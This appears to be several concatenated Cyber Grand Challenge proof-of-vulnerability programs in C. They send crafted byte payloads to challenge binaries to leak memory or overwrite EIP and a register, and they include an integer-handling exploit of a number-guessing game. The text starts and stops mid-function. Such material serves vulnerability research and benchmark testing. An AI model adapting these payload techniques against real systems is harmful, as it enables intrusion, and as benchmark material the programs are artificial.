if (read_00005_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00010 = NULL;
unsigned int write_00010_len = 0;
write_00010 = append_var("sessionB", write_00010, &write_00010_len);
if (write_00010_len > 0) {
transmit_all(1, write_00010, write_00010_len);
}
free(write_00010);
} while (0);
do {
unsigned char *read_00006;
unsigned int read_00006_len;
unsigned int read_00006_ptr = 0;
//**** length read
read_00006_len = 4;
read_00006 = (unsigned char*)malloc(read_00006_len);
int read_00006_res = length_read(0, read_00006, read_00006_len);
if (read_00006_res) {} //silence unused variable warning
free(read_00006);
if (read_00006_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00011 = NULL;
unsigned int write_00011_len = 0;
write_00011 = append_var("sessionA", write_00011, &write_00011_len);
if (write_00011_len > 0) {
transmit_all(1, write_00011, write_00011_len);
}
free(write_00011);
} while (0);
do {
//*** writing data
static unsigned char write_00012_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00";
static unsigned int write_00012_00000_len = 8;
unsigned char *write_00012 = NULL;
unsigned int write_00012_len = 0;
write_00012 = append_buf(write_00012, &write_00012_len, write_00012_00000, write_00012_00000_len);
if (write_00012_len > 0) {
transmit_all(1, write_00012, write_00012_len);
}
free(write_00012);
} while (0);
do {
//*** writing data
static unsigned char write_00013_00000[] =
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static unsigned int write_00013_00000_len = 256;
unsigned char *write_00013 = NULL;
unsigned int write_00013_len = 0;
write_00013 = append_buf(write_00013, &write_00013_len, write_00013_00000, write_00013_00000_len);
if (write_00013_len > 0) {
transmit_all(1, write_00013, write_00013_len);
}
free(write_00013);
} while (0);
do {
//*** writing data
static unsigned char write_00014_00000[] =
"\xc0\x47\x43";
static unsigned int write_00014_00000_len = 3;
unsigned char *write_00014 = NULL;
unsigned int write_00014_len = 0;
write_00014 = append_buf(write_00014, &write_00014_len, write_00014_00000, write_00014_00000_len);
if (write_00014_len > 0) {
transmit_all(1, write_00014, write_00014_len);
}
free(write_00014);
} while (0);
do {
//*** writing data
static unsigned char write_00015_00000[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff";
static unsigned int write_00015_00000_len = 245;
unsigned char *write_00015 = NULL;
unsigned int write_00015_len = 0;
write_00015 = append_buf(write_00015, &write_00015_len, write_00015_00000, write_00015_00000_len);
if (write_00015_len > 0) {
transmit_all(1, write_00015, write_00015_len);
}
free(write_00015);
} while (0);
do {
unsigned char *read_00007;
unsigned int read_00007_len;
unsigned int read_00007_ptr = 0;
//**** length read
read_00007_len = 4;
read_00007 = (unsigned char*)malloc(read_00007_len);
int read_00007_res = length_read(0, read_00007, read_00007_len);
if (read_00007_res) {} //silence unused variable warning
free(read_00007);
if (read_00007_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00008;
unsigned int read_00008_len;
unsigned int read_00008_ptr = 0;
//**** length read
read_00008_len = 256;
read_00008 = (unsigned char*)malloc(read_00008_len);
int read_00008_res = length_read(0, read_00008, read_00008_len);
if (read_00008_res) {} //silence unused variable warning
free(read_00008);
if (read_00008_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00016 = NULL;
unsigned int write_00016_len = 0;
write_00016 = append_var("sessionA", write_00016, &write_00016_len);
if (write_00016_len > 0) {
transmit_all(1, write_00016, write_00016_len);
}
free(write_00016);
} while (0);
do {
unsigned char *read_00009;
unsigned int read_00009_len;
unsigned int read_00009_ptr = 0;
//**** length read
read_00009_len = 4;
read_00009 = (unsigned char*)malloc(read_00009_len);
int read_00009_res = length_read(0, read_00009, read_00009_len);
if (read_00009_res) {} //silence unused variable warning
free(read_00009);
if (read_00009_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
unsigned char *write_00017 = NULL;
unsigned int write_00017_len = 0;
write_00017 = append_var("sessionA", write_00017, &write_00017_len);
if (write_00017_len > 0) {
transmit_all(1, write_00017, write_00017_len);
}
free(write_00017);
} while (0);
do {
//*** writing data
static unsigned char write_00018_00000[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
static unsigned int write_00018_00000_len = 512;
unsigned char *write_00018 = NULL;
unsigned int write_00018_len = 0;
write_00018 = append_buf(write_00018, &write_00018_len, write_00018_00000, write_00018_00000_len);
if (write_00018_len > 0) {
transmit_all(1, write_00018, write_00018_len);
}
free(write_00018);
} while (0);
do {
unsigned char *read_00010;
unsigned int read_00010_len;
unsigned int read_00010_ptr = 0;
//**** length read
read_00010_len = 4;
read_00010 = (unsigned char*)malloc(read_00010_len);
int read_00010_res = length_read(0, read_00010, read_00010_len);
if (read_00010_res) {} //silence unused variable warning
free(read_00010);
if (read_00010_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00011;
unsigned int read_00011_len;
unsigned int read_00011_ptr = 0;
//**** length read
read_00011_len = 4;
read_00011 = (unsigned char*)malloc(read_00011_len);
int read_00011_res = length_read(0, read_00011, read_00011_len);
if (read_00011_res) {} //silence unused variable warning
//**** read assign to var "leak" from slice
assign_from_slice("leak", read_00011, read_00011_len - read_00011_ptr, 0, 0, 1);
free(read_00011);
if (read_00011_ptr) {} //silence unused variable warning if any
} while (0);
//*** submitting type 2 POV results
submit_type2("leak");
}
int play_hi_lo(int scored_game)
{
unsigned char len_resp[128];
unsigned int resp_len = 0;
unsigned char *resp = NULL;
char *guess_msg = malloc(128);
char *guess_buf = malloc(128);
char *select_guess_num_game = "2\n";
char *pov_guess_num = "-1\n";
char *normal_guess_num = "0\n";
int num_guesses = 33;
int guess_lower = -2147483647;
int guess_upper = 2147483647;
int guess = 0;
int won = 0;
if (scored_game) {
pov_guess_num = normal_guess_num;
num_guesses = 16;
guess_upper = 0xffff;
guess_lower = 0;
guess = (guess_upper - guess_lower) / 2;
}
read_until_game_prompt();
length_read(STDIN, len_resp, cgc_strlen("Game # "));
transmit_all(STDOUT, select_guess_num_game, cgc_strlen(select_guess_num_game));
length_read(STDIN, len_resp, cgc_strlen("Enter max value (Default=65535): "));
transmit_all(STDOUT, pov_guess_num, cgc_strlen(pov_guess_num));
if (!scored_game) {
length_read(STDIN, len_resp, 1);
if (len_resp[0] == 'E') {
length_read(STDIN, len_resp, cgc_strlen("nter max value (Default=65535): "));
transmit_all(STDOUT, normal_guess_num, cgc_strlen(normal_guess_num));
num_guesses = 16;
guess_upper = 0xffff;
guess_lower = 0;
guess = (guess_upper - guess_lower) / 2;
} else {
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
num_guesses = 33;
}
}
while(num_guesses) {
cgc_memset(guess_buf, 0, 128);
cgc_memset(guess_msg, 0, 128);
cgc_memset(len_resp, 0, 128);
sprintf(guess_buf, "%d\n", guess);
sprintf(guess_msg, "Guess the number [%d guesses left]: ", num_guesses--);
length_read(STDIN, len_resp, cgc_strlen(guess_msg));
transmit_all(STDOUT, guess_buf, cgc_strlen(guess_buf));
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
if (memcmp(resp, "Too Low", 7) == 0) {
guess_lower = guess;
guess += (guess_upper - guess_lower) / 2;
} else if(memcmp(resp, "Too High", 8) == 0) {
guess_upper = guess;
guess -= (guess_upper - guess_lower) / 2;
} else if(memcmp(resp, "You won!", 8) == 0) {
won = 1;
break;
}
}
if (!won) {
delimited_read(STDIN, &resp, &resp_len, (unsigned char *)"\n", 1);
if (memcmp(resp, "Sorry", 5) == 0) {
//transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit));
return 0;
}
}
//If POV
type2_submit((void *)&guess, sizeof(int));
return 1;
}
int main(void) {
negotiate_type2();
unsigned char flag[4] = {0, 0, 0, 0};
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x03\x03\x03\x03";
static unsigned int write_00000_00000_len = 4;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length cgc_read
read_00000_len = 3;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
// first 3 byte of flag come from stamp0
for (int i = 0; i < 3; i++)
flag[i] = read_00000[i];
if (read_00000_res) {} //silence unused variable warning
//**** cgc_read assign to var "stamp0" from slice
assign_from_slice("stamp0", read_00000, read_00000_len - read_00000_ptr, 0, 3, 0);
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length cgc_read
read_00001_len = 2;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00001_00000[] =
"\x04\x04";
read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 2);
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x03\x03\x03\x03";
static unsigned int write_00001_00000_len = 4;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length cgc_read
read_00002_len = 3;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
// 4th byte of flag comes from stamp1
flag[3] = read_00002[0];
if (read_00002_res) {} //silence unused variable warning
//**** cgc_read assign to var "stamp1" from slice
assign_from_slice("stamp1", read_00002, read_00002_len - read_00002_ptr, 0, 3, 0);
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length cgc_read
read_00003_len = 2;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00003_00000[] =
"\x04\x04";
read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 2);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x00\x0f\xf0\xff";
static unsigned int write_00002_00000_len = 4;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length cgc_read
read_00004_len = 2;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00004_00000[] =
"\x04\x17";
read_00004_ptr += data_match(read_00004 + read_00004_ptr, read_00004_len - read_00004_ptr, match_00004_00000, 2);
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
//*** submitting type 2 POV results
// submit_type2("flag");
type2_submit(flag, 4);
}
int main(void) {
negotiate_type2();
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x69\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x61";
static unsigned int write_00000_00000_len = 14;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length read
read_00000_len = 4;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00000_00000[] =
"\x00\x00\x00\x00";
read_00000_ptr += data_match(read_00000 + read_00000_ptr, read_00000_len - read_00000_ptr, match_00000_00000, 4);
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x6d\x25\x42\x2f\xb1\x25\x42\x2f\xb1\x04\x00\x00\x00\x00\x00\x00"
"\x00";
static unsigned int write_00001_00000_len = 17;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
//**** read match data
static unsigned char match_00001_00000[] =
"\x00\x00\x00\x00";
read_00001_ptr += data_match(read_00001 + read_00001_ptr, read_00001_len - read_00001_ptr, match_00001_00000, 4);
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x3d\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
"\x00";
static unsigned int write_00002_00000_len = 17;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length read
read_00002_len = 16;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
//**** read assign to var "TYPE2_VALUE" from slice
assign_from_slice("TYPE2_VALUE", read_00002, read_00002_len - read_00002_ptr, 12, 0, 1);
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00003_00000[] =
"\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
static unsigned int write_00003_00000_len = 13;
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_buf(write_00003, &write_00003_len, write_00003_00000, write_00003_00000_len);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
//*** delay
delay(100);
//*** submitting type 2 POV results
submit_type2(NULL);
}
int main(void) {
type1_vals t1vals;
type1_negotiate(0xedededed, 0xededede5, 6, &t1vals); // ESI == 6, last byte is going to be off by 8
unsigned int no_ed = 0x12121212; // have to prevent 0xed from each byte of EIP and REG
do {
//*** writing data
static unsigned char write_00000_00000[] =
"\x04\xd4\x7e\x00";
static unsigned int write_00000_00000_len = 4;
unsigned char *write_00000 = NULL;
unsigned int write_00000_len = 0;
write_00000 = append_buf(write_00000, &write_00000_len, write_00000_00000, write_00000_00000_len);
if (write_00000_len > 0) {
transmit_all(1, write_00000, write_00000_len);
}
free(write_00000);
} while (0);
do {
//*** writing data
static unsigned char write_00001_00000[] =
"\x31\x33\x30\x30\x31\x33\x38\x38";
static unsigned int write_00001_00000_len = 8;
unsigned char *write_00001 = NULL;
unsigned int write_00001_len = 0;
write_00001 = append_buf(write_00001, &write_00001_len, write_00001_00000, write_00001_00000_len);
if (write_00001_len > 0) {
transmit_all(1, write_00001, write_00001_len);
}
free(write_00001);
} while (0);
do {
//*** writing data
static unsigned char write_00002_00000[] =
"\x0f\x44\x00\x00\xcd\xcc\x3c\x40\x75\x4d\x68\x49\x65\x4e\x46\x51"
"\x5a\x4b\x69\x7a\x62\x57\x6d\x41\x66\x53\x48\x70\x52\x62\x49\x56"
"\x57\x4e\x56\x43\x66\x70\x51\x5a\x4c\x78\x6b\x7a\x4f\x7a\x61\x65"
"\x77\x64\x56\x56\x54\x78\x43\x56\x6f\x62\x42\x51\x50\x66\x47\x76"
"\x75\x64\x45\x51\x74\x4b\x6c\x72\x50\x67\x79\x59\x64\x56\x52\x4d"
"\x6c\x50\x55\x57\x58\x41\x57\x4a\x62\x42\x69\x47\x41\x52\x55\x59"
"\x77\x77\x59\x54\x58\x44\x43\x55\x42\x7a\x47\x76\x63\x6b\x6f\x52"
"\x70\x5a\x69\x6b\x6b\x79\x71\x77\x6b\x67\x61\x66\x58\x6d\x61\x50"
"\x56\x74\x52\x47\x45\x54\x62\x63\x41\x42\x43\x44\x45\x46\x47\x48";
static unsigned int write_00002_00000_len = 144;
unsigned char *write_00002 = NULL;
unsigned int write_00002_len = 0;
write_00002 = append_buf(write_00002, &write_00002_len, write_00002_00000, write_00002_00000_len);
if (write_00002_len > 0) {
transmit_all(1, write_00002, write_00002_len);
}
free(write_00002);
} while (0);
do {
// # &desc_copy (EIP) -> JKLM
//*** writing data
unsigned int eip = t1vals.ipval | no_ed;
unsigned char *write_00003 = NULL;
unsigned int write_00003_len = 0;
write_00003 = append_buf(write_00003, &write_00003_len, (unsigned char*)&eip, 4);
if (write_00003_len > 0) {
transmit_all(1, write_00003, write_00003_len);
}
free(write_00003);
} while (0);
do {
// # &p (ESI) -> (N+8)OPQ
//*** writing data
unsigned int reg = t1vals.regval | no_ed;
unsigned char *write_00004 = NULL;
unsigned int write_00004_len = 0;
write_00004 = append_buf(write_00004, &write_00004_len, (unsigned char*)®, 4);
if (write_00004_len > 0) {
transmit_all(1, write_00004, write_00004_len);
}
free(write_00004);
} while (0);
do {
//*** writing data
static unsigned char write_00005_00000[] =
"\xed";
static unsigned int write_00005_00000_len = 1;
unsigned char *write_00005 = NULL;
unsigned int write_00005_len = 0;
write_00005 = append_buf(write_00005, &write_00005_len, write_00005_00000, write_00005_00000_len);
if (write_00005_len > 0) {
transmit_all(1, write_00005, write_00005_len);
}
free(write_00005);
} while (0);
do {
unsigned char *read_00000;
unsigned int read_00000_len;
unsigned int read_00000_ptr = 0;
//**** length cgc_read
read_00000_len = 2;
read_00000 = (unsigned char*)malloc(read_00000_len);
int read_00000_res = length_read(0, read_00000, read_00000_len);
if (read_00000_res) {} //silence unused variable warning
free(read_00000);
if (read_00000_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00006_00000[] =
"\xc4\xec\x4e\xee";
static unsigned int write_00006_00000_len = 4;
unsigned char *write_00006 = NULL;
unsigned int write_00006_len = 0;
write_00006 = append_buf(write_00006, &write_00006_len, write_00006_00000, write_00006_00000_len);
if (write_00006_len > 0) {
transmit_all(1, write_00006, write_00006_len);
}
free(write_00006);
} while (0);
do {
//*** writing data
static unsigned char write_00007_00000[] =
"\x31\x33\x30\x30\x31\x33\x38\x38";
static unsigned int write_00007_00000_len = 8;
unsigned char *write_00007 = NULL;
unsigned int write_00007_len = 0;
write_00007 = append_buf(write_00007, &write_00007_len, write_00007_00000, write_00007_00000_len);
if (write_00007_len > 0) {
transmit_all(1, write_00007, write_00007_len);
}
free(write_00007);
} while (0);
do {
unsigned char *read_00001;
unsigned int read_00001_len;
unsigned int read_00001_ptr = 0;
//**** length cgc_read
read_00001_len = 4;
read_00001 = (unsigned char*)malloc(read_00001_len);
int read_00001_res = length_read(0, read_00001, read_00001_len);
if (read_00001_res) {} //silence unused variable warning
free(read_00001);
if (read_00001_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00002;
unsigned int read_00002_len;
unsigned int read_00002_ptr = 0;
//**** length cgc_read
read_00002_len = 4;
read_00002 = (unsigned char*)malloc(read_00002_len);
int read_00002_res = length_read(0, read_00002, read_00002_len);
if (read_00002_res) {} //silence unused variable warning
free(read_00002);
if (read_00002_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00003;
unsigned int read_00003_len;
unsigned int read_00003_ptr = 0;
//**** length cgc_read
read_00003_len = 145;
read_00003 = (unsigned char*)malloc(read_00003_len);
int read_00003_res = length_read(0, read_00003, read_00003_len);
if (read_00003_res) {} //silence unused variable warning
//**** cgc_read match data
static unsigned char match_00003_00000[] =
"\x75\x4d\x68\x49\x65\x4e\x46\x51\x5a\x4b\x69\x7a\x62\x57\x6d\x41"
"\x66\x53\x48\x70\x52\x62\x49\x56\x57\x4e\x56\x43\x66\x70\x51\x5a"
"\x4c\x78\x6b\x7a\x4f\x7a\x61\x65\x77\x64\x56\x56\x54\x78\x43\x56"
"\x6f\x62\x42\x51\x50\x66\x47\x76\x75\x64\x45\x51\x74\x4b\x6c\x72"
"\x50\x67\x79\x59\x64\x56\x52\x4d\x6c\x50\x55\x57\x58\x41\x57\x4a"
"\x62\x42\x69\x47\x41\x52\x55\x59\x77\x77\x59\x54\x58\x44\x43\x55"
"\x42\x7a\x47\x76\x63\x6b\x6f\x52\x70\x5a\x69\x6b\x6b\x79\x71\x77"
"\x6b\x67\x61\x66\x58\x6d\x61\x50\x56\x74\x52\x47\x45\x54\x62\x63"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\xed";
read_00003_ptr += data_match(read_00003 + read_00003_ptr, read_00003_len - read_00003_ptr, match_00003_00000, 145);
free(read_00003);
if (read_00003_ptr) {} //silence unused variable warning if any
} while (0);
do {
unsigned char *read_00004;
unsigned int read_00004_len;
unsigned int read_00004_ptr = 0;
//**** length cgc_read
read_00004_len = 2;
read_00004 = (unsigned char*)malloc(read_00004_len);
int read_00004_res = length_read(0, read_00004, read_00004_len);
if (read_00004_res) {} //silence unused variable warning
free(read_00004);
if (read_00004_ptr) {} //silence unused variable warning if any
} while (0);
do {
//*** writing data
static unsigned char write_00008_00000[] =
"\xff\xff\xff\xff";
static unsigned int write_00008_00000_len = 4;
unsigned char *write_00008 = NULL;
unsigned int write_00008_len = 0;
write_00008 = append_buf(write_00008, &write_00008_len, write_00008_00000, write_00008_00000_len);
if (write_00008_len > 0) {
transmit_all(1, write_00008, write_00008_len);
}
free(write_00008);
} while (0);
do {
unsigned char *read_00005;
unsigned int read_00005_len;
unsigned int read_00005_ptr = 0;
//**** length cgc_read
read_00005_len = 2;
read_00005 = (unsigned char*)malloc(read_00005_len);
int read_00005_res = length_read(0, read_00005, read_00005_len);
if (read_00005_res) {} //silence unused variable warning
free(read_00005);
if (read_00005_ptr) {} //silence unused variable warning if any
} while (0);
}
int main(void) {
type1_vals t1vals = { 0 };
uint32_t mask_eip, mask_reg;
mask_eip = 0x0FFFFFFF;
mask_reg = 0x0FFFFFFF;
type1_negotiate(mask_eip, mask_reg, 2, &t1vals);
t1vals.ipval |= 0xF0000000; // make sure out of range of valid fn ptrs
t1vals.regval |= 0xF0000000; // make sure out of range of valid fn ptrs
// parent2 regval
// parent3 ipval
unsigned int p2_val = t1vals.regval;
unsigned int p3_val = t1vals.ipval;
do {
//*** writing data (child)
